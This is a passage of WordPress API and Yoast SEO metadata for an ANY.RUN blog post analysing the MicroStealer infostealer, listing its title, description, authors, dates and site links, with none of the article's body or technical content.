for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},[{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"nevergiveupcpp\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/photo_author_2-150x150.jpg\",\"caption\":\"nevergiveupcpp\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"4OURUP\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/4up-150x150.jpg\",\"caption\":\"4OURUP\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"GridGuardGhoul\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/image_GridGuardGhoul-150x150.jpeg\",\"caption\":\"GridGuardGhoul\"}}]]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MicroStealer: Emerging Infostealer Targeting Corporate Credentials","description":"Explore how MicroStealer operates, what risks it creates for enterprises, and how ANY.RUN helps security teams detect it faster.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/","twitter_misc":{"Written by":"nevergiveupcpp, 4OURUP and GridGuardGhoul","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/"},"author":{"name":"nevergiveupcpp, 4OURUP and GridGuardGhoul","@id":"https:\/\/any.run\/"},"headline":"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0","datePublished":"2026-03-12T09:56:43+00:00","dateModified":"2026-03-25T10:16:50+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/"},"wordCount":3551,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/","url":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/","name":"MicroStealer: Emerging Infostealer Targeting Corporate Credentials","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2026-03-12T09:56:43+00:00","dateModified":"2026-03-25T10:16:50+00:00","description":"Explore how MicroStealer operates, what risks it creates for enterprises, and how ANY.RUN helps security teams detect it faster.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},[{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"nevergiveupcpp","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/photo_author_2-150x150.jpg","caption":"nevergiveupcpp"}},{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"4OURUP","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/4up-150x150.jpg","caption":"4OURUP"}},{"@type":["Person"],"@id":"https:\/\/any.run\/","name":"GridGuardGhoul","image":{"@type":"ImageObject","@id":"https:\/\/any.run\/","inLanguage":"en_US","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/image_GridGuardGhoul-150x150.jpeg","caption":"GridGuardGhoul"}}]]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19049"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=19049"}],"version-history":[{"count":98,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19049\/revisions"}],"predecessor-version":[{"id":19178,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19049\/revisions\/19178"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/19062"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=19049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=19049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=19049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}